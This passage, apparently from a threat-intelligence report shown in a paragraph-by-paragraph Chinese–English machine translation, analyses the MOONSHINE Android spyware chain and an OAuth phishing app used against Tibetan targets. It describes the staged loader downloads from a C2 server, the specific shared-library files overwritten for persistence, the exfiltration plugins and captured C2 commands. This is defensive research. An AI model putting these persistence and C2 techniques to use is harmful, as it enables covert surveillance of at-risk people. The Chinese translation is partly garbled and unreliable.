每个漏洞都运行相同的 shell 代码,它从 hxxp:/ / [ MoonshineSite ] :5000 / dev / Loader 下载了一个 ARMv7 ELF 二进制文件(我们称之为 Loader),并将二进制文件存储在 Facebook app 文件夹中,即(/ data / data / com。[ BinaryName ]),其中[ BinaryName ]是一个随机的字母数字字符串。Shellcode 然后执行 Loader,传递 http:/ / [ MoonshineSite ] :5000 / 和 / data / data / com。[ BinaryName ]作为参数。

Each exploit ran the same shellcode, which downloaded an ARMv7 ELF binary file (which we call the Loader) from hxxp://[MoonshineSite]:5000/dev/loader, and stored the binary in the Facebook app folder as (/data/data/com.facebook.katana/[BinaryName]), where [BinaryName] is a random alphanumeric string. The shellcode then executed the Loader, passing http://[MoonshineSite]:5000/ and /data/data/com.facebook.katana/[BinaryName] as arguments.

我们还尝试使用 Android 用户代理获取这些漏洞的 Facebook Messenger。在这种情况下,一切都是一样的,除了 Loader 被下载到 Facebook Messenger 应用程序文件夹(/ data / data / com。Orca / [ BinaryName ]),这条路径通过 shell 代码作为 Loader 的第二个参数传递。

We also tried fetching the exploits using an Android User-Agent for Facebook Messenger. In that case, everything was the same, except the Loader was downloaded to the Facebook Messenger app folder (/data/data/com.facebook.orca/[BinaryName]), and this path was passed by the shellcode as the second argument to the Loader.


Android Implant Overview

Moonshine Loader 是一系列中间阶段的恶意软件二进制程序中的第一个,这些恶意软件按顺序执行,以提供最终的有效载荷:开发者称之为「Scotch」的功能齐全的安卓间谍软件包。图10提供了安装过程的概述。

The MOONSHINE Loader was the first in a series of intermediary staged malware binaries sequentially executed to deliver the ultimate payload: a fully featured Android spyware package called “Scotch” by its developers. Figure 10 provides an overview of the installation process.

Moonshine 是为无根操作而设计的,它利用内置浏览器,请求敏感权限的流行合法安卓应用程序。Moonshine 通过覆盖一个不经常使用的共享库(.so)文件在这些应用程序之一本身。当目标用户使用后打开合法的应用程序,应用程序加载到内存中的共享库,这导致间谍软件激活。虽然 MOONSHINE 后续阶段的代码表明,它可以部署在4个应用程序(Facebook、 Facebook Messenger、微信和 QQ)上,但我们测试的攻击站点没有提供任何微信或 QQ 用户代理头部的漏洞。

MOONSHINE is designed for stealthy rootless operation, by exploiting popular legitimate Android apps with built-in browsers that request sensitive permissions. MOONSHINE obtains persistence by overwriting an infrequently used shared library (.so) file in one of these apps with itself. When a targeted user opens the legitimate app after exploitation, the app loads the shared library into memory, which causes the spyware to activate. While code in subsequent stages of MOONSHINE suggests that it can be deployed against four apps (Facebook, Facebook Messenger, WeChat, and QQ), the exploit site we tested against did not deliver any exploits for WeChat or QQ User-Agent headers.

由 MOONSHINE,Scotch 部署的终极间谍软件工具是一个模块化的 Java 应用程序,使用 WebSocket 协议与其 C2服务器进行通信。Scotch 的有效载荷本身具有有限的间谍功能,例如获取设备信息和从被感染设备上传文件。然而,作为与 C2最初接触的一部分,Scotch 下载了额外的插件。在我们的分析过程中,我们获得了两个插件包,分别名为「Bourbon.jar」和「IceCube.jar」,它们增加了一些功能,包括逃离短信、地址簿和通话记录,以及通过手机摄像头、麦克风和 GPS 监视目标。

The ultimate spyware tool deployed by MOONSHINE, Scotch, is a modular Java application which uses the WebSocket protocol to communicate with its C2 server. The Scotch payload itself has limited espionage features, such as obtaining device information and uploading files from the infected device. However, as part of its initial contact with the C2, Scotch downloads additional plugins. During our analysis, we were able to acquire two plugin packages, named “Bourbon.jar” and “IceCube.jar” which added functionality including exfiltrating SMS text messages, address books, and call logs, and spying on the target through their phone’s camera, microphone, and GPS.


Loader Stage

在安装了 MOONSHINE Loader 之后,Loader 使用路径:hxxp:/ / [ MoonshineSite ] :5000 / dev / Loader / post 将签入消息发送到 C2服务器。

After the MOONSHINE Loader is installed, the Loader POSTs a check-in message to the C2 server using the path: hxxp://[MoonshineSite]:5000/dev/loader/post.

C2服务器响应向 Loader 提供指令,包括下载和执行恶意软件链下一阶段(tdu 参数)的 URL,以及从 app 文件夹中删除的一系列文件(cf 参数),这些文件在某些情况下可能由 Loader 的不同调用生成。当我们向一个 C2发送签到信息时,我们收到了以下指示:

The C2 server response provides instructions to the Loader, including a URL from which to download and execute the next stage of the malware chain (tdu= parameter), as well as a series of files to delete from the app folder (cf= parameter), which may be generated in certain circumstances by different invocations of the Loader. When we POSTed a check-in message to a C2, we received the following instructions:


这些指令导致 Loader 将 / im / lure 下载到 Facebook app 文件夹中,并执行它。这个二进制文件是一个 ARMv7 ELF 二进制文件,开发者称之为基于二进制文件中字符串的威士忌。

The instructions cause the Loader to download /im/lure into the Facebook app folder, and execute it. This binary was an ARMv7 ELF binary that the developers refer to as Whisky based on strings in the binary.

图10:MOONSHINE 间谍软件套件的多级安装。

Figure 10: Multistage installation of the MOONSHINE spyware kit.


Whisky Stage

威士忌的第一步是确定哪个共享库(.so)文件应该被 MOONSHINE 的下一阶段重写— 开发者称之为「Bourbon」— 通过确定当前应用程序的上下文来重写当前的应用工作目录。如果 Whisky 碰巧是 Android 设备上的 root 用户,那么使用的目标文件名是 / data / local / tmp / libbourbon.so。

Whisky’s first step is to determine which shared library (.so) file should be overwritten by the next stage of MOONSHINE — called “Bourbon” by developers — by determining the current application context from the current working directory (Table 2). If Whisky happens to be running as the root user on the Android device, then the target filename used is /data/local/tmp/libbourbon.so.

If current application is … Then write to this shared library filename:
com.facebook.katana (Facebook) /data/data/com.facebook.katana/lib-xzs/libaborthooks.so
com.facebook.orca (Facebook Messenger) /data/data/com.facebook.orca/lib-xzs/liblog.so
com.tencent.mm (WeChat) /data/data/com.tencent.mm/app_tbs/core_share/libwebp_base.so
com.tencent.mobileqq (QQ) /data/data/com.tencent.mobileqq/files/TencentVideoKit/armeabi/libckeygenerator.so


Table 2: Application context to destination filename map.

这些目标文件名是有意选择的,并用作持久化和隐蔽执行的方法。对于 Facebook 和 Facebook Messenger,表2中的共享库文件在应用程序启动时加载。在确定目的地文件名之后,Whisky 通过以下高级步骤提取 Bourbon:

These destination filenames are chosen intentionally, and act as a method of persistence and covert execution. In the case of Facebook and Facebook Messenger, the shared library files in Table 2 are loaded when the apps start. After determining the destination filename, Whisky extracts Bourbon by following these high level steps:

图11:在 Whisky 中存储的 XXTEA 键、 MD5散列和文件大小。

Figure 11: The XXTEA key, MD5 hash, and file size stored in Whisky.


Bourbon Stage

当用户打开应用程序时,Bourbon 已经被植入其中,例如,Facebook,the

When a user opens the app that Bourbon has been implanted inside, e.g., Facebook, the

应用程序将 Bourbon 库加载到 Android Runtime 中,调用 Bourbon 的 JNI onload 方法。Bourbon 中的 JNI onload 方法使用 extractScotch 方法从自身提取下一个有效负载,即「Scotch」(图12)。该方法采取以下步骤:

App loads the Bourbon library into the Android Runtime, which calls Bourbon’s JNI_Onload method. The JNI_Onload method in Bourbon extracts the next payload, named “Scotch”, from itself using the extractScotch method (Figure 12). The method takes the following steps:

图12:波旁二元制的萃取 / 苏格兰方法。

Figure 12: The extractScotch method from the Bourbon binary.

将 Scotch 植入程序写入 Bourbon 植入的应用程序目录中的磁盘,例如:/ data / data / com.facebook.com. katana / app sikhyws ca55200e / Scotch.jar。

The Scotch implant is written to disk in the directory for the app that Bourbon was implanted in, for example: /data/data/com.facebook.katana/app_sikhywis_ca55200e/scotch.jar.


Scotch Stage

苏格兰舞台是最后的植入,提供了一个可扩展的,持久的间谍软件工具。加载后,苏格兰人工植入产生两个标识符:一个是威士忌 id,由随机 UUID 值的 SHA256散列生成;另一个是设备 id,由指纹字符串的 SHA256散列生成,该指纹字符串由特定于受感染设备的各种值组成。然后植入物使用 WebSocket 协议连接到 C2服务器上的端口10011,从而允许植入物和 C2服务器之间的双向通信。使用这个 WebSocket 连接,Scotch 通过以下 URL 向 C2服务器发送初始签入消息:ws:/ / [ MoonshineSite ] :10011 / ws?Whisky id [ sha256] & device id [ sha256] & error 0.

The Scotch stage is the final implant, providing an extensible, persistent spyware tool. Upon loading, the Scotch implant generates two identifiers: a Whisky_ID, generated by taking the SHA256 hash of a random UUID value, and a Device_ID, constructed by taking the SHA256 hash of a fingerprint string comprised of various values specific to the infected device. The implant then makes a connection to port 10011 on the C2 server using the WebSocket protocol, thereby allowing bi-directional communication between the implant and the C2 server. Using this WebSocket connection, Scotch sends an initial check-in message to the C2 server at the following URL: ws://[MoonshineSite]:10011/ws?whisky_id=[sha256]&device_id=[sha256]&error=0.

Scotch 提供了一些开箱即用的基本间谍功能,但它从 C2服务器下载插件来增强其功能。在 Scotch 的初始状态下,基本的 C2命令有:

Scotch provides some basic espionage capabilities out of the box, but it downloads plugins from the C2 server to augment its functionality. The basic C2 commands available in Scotch’s initial state are:

当我们用 Scotch 感染我们的测试设备时,它立即更新了两个新的 DEX 格式的插件包:Bourbon.jar 和 IceCube.jar。Jar 插件包增加了以下功能:

When we infected our test device with Scotch, it was immediately updated with two new plugin bundles in DEX format: Bourbon.jar and IceCube.jar. The Bourbon.jar plugin package added the following functionality:

Jar 插件包增加了更多功能:

The IceCube.jar plugin package added further functionality:

植入体和 C2通信使用 JSON 格式的信息,这些信息先用 GZIP 压缩,然后用 Base64编码,然后再通过 WebSocket 传输。在捕获感染设备和 C2服务器之间的网络流量后,我们能够解码并观察通信模式。附录 a 提供了这种流量的一个例子。

The implant and C2 communicated using JSON formatted messages which were compressed using GZIP and then Base64 encoded prior to transmission via WebSocket. After capturing network traffic between our infected device and the C2 server, we were able to decode and observe the communication pattern. An example of this traffic is provided in Appendix A.

在分析 MOONSHINE 网站,我们发现两个不同的登录页面,可用于管理植入和利用。这些界面的屏幕截图如图13所示。Scotchmanager 托管于端口9090,而 vokamanager 托管于端口8080。

During analysis of MOONSHINE websites, we discovered two distinct login pages that may be used to manage implants and exploits. Screenshots of these interfaces are shown in Figure 13. ScotchManager was hosted on port 9090, and VodkaManager was hosted on port 8080.

图13:怀疑是 MOONSHINE 管理界面。

Figure 13: Suspected MOONSHINE management interfaces.


Although one of these panels carries the name VodkaManager, we did not uncover any specific module or component of MOONSHINE that used the name “Vodka”.



我们相信这个被我们称为 MOONSHINE 的安卓漏洞和间谍软件包的发现代表了一个以前没有记录的间谍工具。它的多阶段安装方法以及通过共享对象库劫持实现的持久性都表明它具有高度的操作安全意识和熟练的开发能力。

We believe that the discovery of this Android exploit and spyware kit we dubbed MOONSHINE represents a previously undocumented espionage tool. Its multi-stage installation approach along with its persistence via shared object library hijacking both suggest a high degree of operational security awareness and skilled development.

4. 恶意 OAuth 应用程序

4. Malicious OAuth Application

开放认证(OAuth)是一个为访问授权而设计的协议,已经成为主要平台(如 Facebook、 Google、 Twitter 等)允许与第三方应用程序共享帐户信息的流行方式。

Open Authentication (OAuth) is a protocol designed for access delegation and has become a popular way for major platforms (e.g., Facebook, Google, Twitter, etc.) to permit sharing of account information with third party applications.

恶意 OAuth 应用程序已经在钓鱼攻击中被用于数字间谍活动和一般的网络犯罪。最近,我们还看到一些针对西藏社区的恶意 OAuth 应用程序,可能是为了吸引那些利用双重身份验证来保护自己谷歌账户安全的钓鱼用户。

Malicious OAuth applications have been used in phishing attacks both in digital espionage operations and generic cybercrime. Recently, we have also seen campaigns using malicious OAuth applications targeting the Tibetan community, perhaps in an effort to phish users who take advantage of two-factor authentication to secure their Google accounts.

2019年5月31日,西藏议会的一名议员收到了 WhatsApp 的消息,要求确认一个新闻故事(图14)。这个人之前在2018年11月的 WhatsApp 信息中被利用链接发送给了 iOS。这条消息包括两个 Bitly 链接。消息中发送的第一个短链接扩展到 hxxps:/ / www.energy-mail [ . ] Org / b20v54,它重定向到一个名为 Energy Mail 的 Google OAuth 应用程序,该应用程序请求访问 Gmail 数据(图15)。经过后续点击,链接只是重定向到一个合法的谷歌登录页面。第二个 bit.ly 链接为 MOONSHINE 提供服务,这使我们确定这些 OAuth 攻击与移动开发活动是由同一家运营商实施的。

On May 31, 2019, a member of the Tibetan Parliament received a WhatsApp message requesting confirmation of a news story (Figure 14). The same individual previously was sent iOS exploit links in a WhatsApp message in November 2018. The message included two Bitly links. The first short link sent in the message extended to hxxps://www.energy-mail[.]org/B20V54 , which redirected to a Google OAuth application called Energy Mail that requests access to Gmail data (Figure 15). After subsequent clicks, the link simply redirected to a legitimate Google login page. The second bit.ly link served MOONSHINE, leading us to determine that these OAuth attacks are carried out by the same operator as the mobile exploitation activity.


Figure 14: Two malicious links received by member of Tibetan Parliament.

当我们访问 www.energy-mail 时[ . ] 在一个 web 浏览器中,我们看到了一个名为「能量邮件」(Energy Mail)的邮件应用程序的诱饵页面,这个邮件应用程序声称是「一个配置简单、免费定制的免费电子邮件应用程序」,支持「Gmail、 Outlook、 Hotmail、 Yahoo、腾讯商务、新浪、网易等等」 这个诱饵页面可能是为了说服某些人审查 OAuth 应用程序,让他们相信它的用途是合法的。

When we visited www.energy-mail[.]org in a web browser, we were presented with a decoy page for a mail app called “Energy Mail” that purported to be “a free email application with simple configuration and free customization” supporting “Gmail, Outlook, Hotmail, Yahoo, Tencent business, Sina, Netease, and many more.” This decoy page may have been designed to convince someone vetting the OAuth app that it served a legitimate purpose.


Figure 15 : Authorization screen for the “Energy Mail” account phishing application.

基于诱骗页面的相似性和使用来自 RiskIQ 的被动 DNS 数据,我们确定了下列网站似乎是由同一个运营商使用的:

We identified the following websites that appeared to be used by the same operator, based on similarity of decoy pages and by using Passive DNS data from RiskIQ:


Decoy 页面和 OAuth 应用程序包含以下联系信息:

Decoy pages and OAuth applications contained the following contact information:

+852 65891393 #

我们发现以下 WHOIS 数据在其中一些网站上共享:

We found the following WHOIS data shared among some of these sites:

e-mail: dashenqu832@outlook.com
e-mail: ornaments798@outlook.com

5. 总结

5. Conclusion

我们分析的一个重要发现是 POISON CARP 和 Google Project Zero 和 Volexity 报道的活动之间的联系。基于在 POISON CARP 和 Google Project Zero 描述的运动以及 Volexity 报道的服务器基础设施与 Evil Eye 运动的连接之间使用相同的 iOS 漏洞和类似的 iOS 间谍软件植入,我们确定这三个运动很可能是由同一个运营商或者一个密切合作的运营商小组共享资源进行的。

One of the significant findings of our analysis is the connection between POISON CARP and the campaigns reported by Google Project Zero and Volexity. Based on the use of the same iOS exploits and similar iOS spyware implant between POISON CARP and the campaign described by Google Project Zero and server infrastructure connections with the Evil Eye campaign reported by Volexity, we determine that the three campaigns were likely conducted by the same operator or a closely coordinated group of operators who share resources.

除了技术上的重叠之外,这些运动的目标都是与中国有关的少数民族群体:维吾尔族和藏族。这些社区经历了数字间谍威胁超过十年,以前的报告经常发现相同的操作者和恶意软件工具包针对他们。然而,毒鲤和相关战役的威胁等级是游戏规则的改变者。这些活动是第一个记录在案的 iOS 漏洞和间谍软件被用来对付这些社区的案例。

Beyond the technical overlap in these campaigns is the fact that they all targeted ethnic minority groups related to China: Uyghurs and Tibetans. These communities have experienced digital espionage threats for over a decade and previous reports often find the same operators and malware tool kits targeting them. However, the level of threat posed by POISON CARP and the linked campaigns are a game changer. These campaigns are the first documented cases of iOS exploits and spyware being used against these communities.

多年来,西藏组织已经对可疑的电子邮件、附件和网络钓鱼的迹象了如指掌。然而,POISON CARP 显示社区并不期待移动威胁,如果设备运行易受攻击的 iOS 或安卓版本,高点击率的漏洞链接会导致严重的危害。Poison CARP 使用的社交工程之所以成功,部分原因可能在于通过扩展聊天对话和虚拟人物角色,努力使目标个体感到舒适。这种亲密程度的目标定位在移动聊天应用程序上比通过电子邮件更容易实现。

Over the years, Tibetan groups have become savvy to the signs of suspicious emails, attachments, and phishing. However, POISON CARP shows that mobile threats are not expected by the community, as evidenced by the high click rate on the exploit links that would have resulted in significant compromise if the devices were running vulnerable versions of iOS or Android. Part of the success of the social engineering used by POISON CARP is likely due to the effort made to make targeted individuals feel comfortable through the extended chat conversations and fake personas. This intimate level of targeting is easier to achieve on mobile chat apps than through email.

针对移动平台的攻击也反映了我们在世界各地民间社会面临的信息安全威胁中所看到的一般模式。许多报告显示,商业间谍软件供应商专门向政府出售服务,他们的产品通过 iOS 和安卓设备被用来监视活动人士和记者。这些事件表明对开发移动设备的需求日益增长。从对手的角度来看,驱动这种需求的因素是显而易见的。正是在移动设备上,我们巩固了我们的在线生活,民间社会组织和动员起来。手机内部的视图可以提供这些动作的内部视图。

The targeting of mobile platforms also reflects a general pattern we have seen in information security threats to civil society around the world. Numerous reports show the products of commercial spyware vendors who sell services exclusively to governments being used to spy on activists and journalists through their iOS and Android devices. These incidents demonstrate a growing demand for exploitation of mobile devices. From an adversary perspective what drives this demand is clear. It is on mobile devices that we consolidate our online lives and that civil society organizes and mobilizes. A view inside a phone can give a view inside these movements.

应对这些威胁需要民间社会和私营企业采取行动。Tibcert 等努力是加强西藏组织数字安全的重要步骤,可以作为其他民间社会团体的榜样。通过采用政府和私营企业使用的程序、规范和框架,例如 cert,民间社会可以成熟地共享事件应对资源和威胁数据。与此同时,平台提供商应特别关注针对民间社会的威胁。不仅民间社会用户受到数字间谍活动负面影响的风险增加,而且在民间社会目标不知不觉的帮助下开发和打磨的监视工具也使所有用户处于风险之中。

Addressing these threats requires action from within civil society and private industry. Efforts such as TibCERT are important steps forward in increasing the digital security of Tibetan organisations and can serve as examples for other civil society communities. By adopting procedures, norms, and frameworks used by government and private industry such as CERTs, civil society can mature efforts to share incident response resources and data on threats. At the same time, platform providers should pay special attention to threats deployed against civil society. Not only are civil society users at heightened risk of negative consequences from digital espionage, but the surveillance tools developed and honed with the unwitting aid of civil society targets put all users at risk.




This report is a collaboration with the Tibetan Computer Emergency Readiness Team (TibCERT). Special thanks to the TNG.


Indicators of Compromise

在我们的 GitHub 页面上可以找到多种格式的折衷指标。

Indicators of compromise are available on our GitHub page in multiple formats.

附录 a:私酒-苏格兰威士忌指挥及控制交通

Appendix A: MOONSHINE – Scotch Command and Control Traffic

下面是我们捕获的感染了 Scotch 植入的 Android 测试设备和命令控制服务器之间的网络通信的渲染视图。斜体的数据表示经过编辑的信息。

The following is a rendered view of network communication we captured between our Android test device infected with the Scotch implant and the command and control server. Data in italics denotes information which has been redacted.



SERVER -> CLIENT : ONLINE | SUCCESS -> [{'target_id': <int>}]



[{'board_name': 'unknown',

'cpu_corenum': 1,

'cpu_maxfreq': '',

'cpu_minfreq': '',

'cpu_curfreq': 'N/A',

'cpu_feature': 'swp half thumb fastmult vfp edsp neon

vfpv3 tls vfpv4 idiva idivt vfpd32 evtstrm',

'cpu_hardware': 'Dummy Virtual Machine',

'cpu_arch': '7',

'product': 'sdk_phone_armv7',

'model': 'sdk_phone_armv7',

'sdk': '6.0',

'sdk_int': 23,

'imei': '00000000000000',

'hardware': 'ranchu',

'radio_version': '',

'brand': 'Android',

'rom': 'unknown',

'system_version': '6.0',

'linux_version': 'Linux version 3.10.0+ (jinqian@jinqian.mtv.corp.google.com)

(gcc version 4.9 20150123 (prerelease) (GCC) )

#99 SMP PREEMPT Tue May 17 18:35:11 PDT 2016\nay 17 18:35:11 P',

'display': 'sdk_phone_armv7-userdebug 6.0 MASTER 3079352 test-keys',

'host': 'vpeb14.mtv.corp.google.com',

'language': 'en-US',

'host_app_label': 'Loader',

'host_app_version_name': '1.0',

'host_app_version_code': 1,

'host_app_package_name': 'com.facebook.katana',

'host_app_path': '/data/data/com.facebook.katana',

'real_resolution': '1440 * 2880',

'resolution': '1440 * 2712',

'densitydpi': 560,

'sensor': ['Goldfish 3-axis Accelerometer', 'Goldfish 3-axis Magnetic field sensor',

'Goldfish Orientation sensor', 'Goldfish Temperature sensor',

'Goldfish Proximity sensor', 'Goldfish Light sensor',

'Goldfish Pressure sensor', 'Goldfish Humidity sensor'],

'simcard': [],

'packageInfo': [

{'name': 'com.android.smoketest', 'version': '6.0-3079352', 'install_time': 1469048094000},

{'name': 'com.example.android.livecubes', 'version': '6.0-3079352', 'install_time': 1469048288000},

{'name': 'com.example.android.apis', 'version': '6.0-3079352', 'install_time': 1469048339000},

{'name': 'com.facebook.katana', 'version': '1.0', 'install_time': 1564653617080},

{'name': 'com.android.gesture.builder', 'version': '6.0-3079352', 'install_time': 1469048289000},

{'name': 'com.android.smoketest.tests', 'version': '6.0-3079352', 'install_time': 1469048094000},

{'name': 'com.example.android.softkeyboard', 'version': '6.0-3079352', 'install_time': 1469048288000},

{'name': 'com.android.widgetpreview', 'version': '6.0-3079352', 'install_time': 1469048289000}






{'name': 'bourbon.jar', 'version': '0.1.0708.39', 'hash': '<sha256 hash>'},

{'name': 'icecube.jar', 'version': '0.1.0708.39', 'hash': '<sha256 hash>'}




SERVER -> CLIENT : GET_SMS | SUCCESS -> [{'subcmd': 2}]


SERVER -> CLIENT : GET_LOCATION | SUCCESS -> [{'subcmd': 2}]


SERVER -> CLIENT : GET_CONTACT | SUCCESS -> [{'subcmd': 2}]


SERVER -> CLIENT : GET_CALLLOG | SUCCESS -> [{'subcmd': 2}]



SERVER -> CLIENT : GET_SMS | SUCCESS -> [{'subcmd': 2}]

SERVER -> CLIENT : GET_LOCATION | SUCCESS -> [{'subcmd': 2}]

SERVER -> CLIENT : GET_CONTACT | SUCCESS -> [{'subcmd': 2}]

SERVER -> CLIENT : GET_CALLLOG | SUCCESS -> [{'subcmd': 2}]






一键式移动攻击的藏人目标群体:机译  2019-09-27 07:17   刷新   加密线路   快速线路 




浏览 2569
收藏 0
评论 0

网门大陆网址(自带翻墙) | https://x.co/ogate | https://git.io/ogate2 | https://bit.ly/ogate8

网门安卓版(自带翻墙) | 网门电脑版(自带翻墙) | https://x.co/ofile | https://gitlab.com/ogate2/up | https://github.com/opipe/up